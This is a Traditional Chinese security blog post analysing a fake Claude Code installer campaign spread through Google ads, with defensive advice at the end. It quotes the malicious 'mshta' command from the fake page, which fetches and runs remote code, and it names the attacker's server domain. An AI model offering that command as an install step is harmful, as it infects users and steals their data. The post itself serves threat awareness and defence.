Claude Code遭駭客冒用!攻擊者利用Google廣告散佈偽造安裝頁面,誘使使用者執行PowerShell惡意指令以竊取機敏資料。本文深入分析釣魚流程與加密混淆手法,並提供關鍵的資安防範建議。

隨著人工智慧技術的演進,大型語言模型已從「單純回答問題」的生成式階段,正式邁入「具備執行能力」的 AI 代理人(AI Agent)時代。Anthropic 所推出的 Claude Code,便是這場技術變革下的具體產物。它突破了傳統網頁端聊天介面的框架,直接將 AI 能力嵌入使用者的本機開發與終端機(Terminal)環境。這意味著 AI 不再只是提供建議的諮詢角色,而是能直接讀取檔案、編寫程式碼、執行系統測試,並依據反饋自主進行錯誤修正的數位幫手。


這項工具大幅推動了近期科技界所熱議的「氛圍開發(Vibe Coding)」趨勢。在過去的開發流程中,使用者必須在 AI 視窗與整合開發環境(IDE)之間頻繁切換,複製並測試程式碼,過程存在大量的溝通摩擦。而 Claude Code 的出現,將這些底層且重複性的機械化操作完全自動化。使用者只需要透過口語化的自然語言描述核心邏輯或最終目標,AI 就能在高度權限下自主完成多檔案的協調與重構,甚至在跨軟體連接協議的輔助下,處理檔案歸檔、資料搬移等跨平台的自動化秘書業務。


然而,這種「代為執行」的強大能力,建立在使用者賦予 AI 深度操作本機檔案與終端機的最高權限之上。這種全新的互動型態在帶來前所未有生產力的同時,也引來了網路犯罪份子的覬覦。在全面擁抱 AI 代理人以優化工作流程的同時,企業與開發者亦必須提升相應的資安意識。確保所有的工具皆透過官方管道(如 code.claude.com)進行安全的配置與審查,並在執行任何第三方指令前保持高度警惕。唯有在兼顧安全防禦的基礎上,這款劃時代的 AI 工具才能真正轉化為推動數位轉型的安全利器。


如此方便AI工具,也成為駭客攻擊的窗口。以下來說明偽裝成Claude Code安裝程式的資訊竊取攻擊案例。

駭客透過Google廣告散佈偽造Claude Code安裝網站

駭客製作偽造的Claude Code安裝網站,在google廣告上散佈,當有
被害者搜尋「Claude Code」和「Claude Code 安裝」等關鍵字時就會出現偽造網站的搜尋結果,誘使被害人點擊。


當被害者搜尋Claude安裝程式時,偽造網站出現在Google搜尋結果的頂部。
當被害者搜尋Claude安裝程式時,偽造網站出現在Google搜尋結果的頂部。


點擊連結後被重定向到一個偽造的 Anthropic 安裝頁面,頁面模仿了合法的 Claude Code 安裝流程,內容包含Windows及macOS系統的安裝流程。


偽造的claude 安裝頁面。
偽造的claude 安裝頁面。

依網頁內容執行惡意安裝Claude指令造成機敏資料被竊

點進去後發現並不是出現一個安裝檔案的下載頁面而是一個執行指令頁面,一共有4個步驟:

1、開啟 PowerShell (Open PowerShell):

引導你按下鍵盤上的 Win + R 鍵打開「執行」視窗,接著輸入 PowerShell 並按下 Enter 鍵來開啟 Windows 的 PowerShell 終端機。

2、複製指令 (Copy the command):

引導你點擊右側的複製按鈕,來複製欄位中的安裝指令。欄位中的指令為:mshta https://download-version.1-5-8.com/claude.msixbundle。

3、貼上並執行 (Paste and run):

教你在打開的 PowerShell 視窗中點擊滑鼠右鍵進行「貼上」,然後按下 Enter 鍵。畫面上聲稱這會自動開始下載並安裝。

4、依照安裝程式引導 (Follow the installer):

聲稱隨後會跳出 Claude 的設定精靈,只要依序點擊 Next(下一步)>Install(安裝)>Finish(完成),應用程式就會出現在桌面上。
但實際上執行到步驟3的時候就已經被駭客植入惡意程式,竊取被害者的機敏資料。非常狡猾!

Windows系統安裝claude的惡意指令
Windows系統安裝claude的惡意指令

macOS系統安裝claude的惡意指令
macOS系統安裝claude的惡意指令


在PowerShell 載入指令的過程,發現指令經過Base64 編碼加密,藉此躲避網絡流量監控和靜態掃描,編碼解密後會才會看到真正的下載URL。
 

經過Base64 編碼加密的執行指令

經過Base64 編碼加密的執行指令


之後程式會向駭客的伺服器(oakenfjrod[.]ru)發出請求,下載第二階段、PowerShell 腳本。這個腳本刻意做得極度龐大且經過多層混淆(包含多重解密、變數名稱竄改等),目的是為了消耗防護軟體的記憶體限制並增加分析人員的難度,且全程僅在記憶體內執行,不會在硬碟中留下任何檔案,最終成功植入資訊竊取程式,讓被害者造成損失。

流程圖:


流程圖

防範駭客透偽裝claude code安裝程式資訊竊取攻擊造成損失:

1、警惕不合理的安裝步驟(最關鍵的辨識點):

合法的軟體安裝程式絕不會要求使用者開啟 Windows 的「執行」對話方塊(Win+R)並貼上指令(如 mshta.exe)。這是 ClickFix 攻擊的核心特徵,一旦網頁要求您進行這種「手動貼上指令」的操作,即可判定為惡意網站。

2、不要盲目信任搜尋引擎結果:

攻擊者利用SEO投毒技術,將偽造的 claude code 安裝頁面推升至搜尋結果頂部。請務必確認網址是否為官方網域,claude code官方並未遭到駭客入侵,純粹是品牌遭到冒用,因此透過官方公佈的正規途徑安裝是安全的。

3、建立良好習慣,如果真有需要複製指令執行,請先了解或是查詢這段指令的用途:

現在網路資源很發達,很快就可以查到資訊,不要別人提供指令就直接貼上執行非常的危險。

4、定期員工資安訓練或請外部資安專家安排訓練課程:

讓員工學習辨識更多的惡意攻擊手法。

有任何資安問題,歡迎隨時與NEITHNET團隊聯繫!

參考資料:
1.https://www.cyderes.com/howler-cell/fake-claude-code-installer-infostealer?utm  
2.https://www.trendmicro.com/en_us/research/26/e/installfix-and-claude-code.html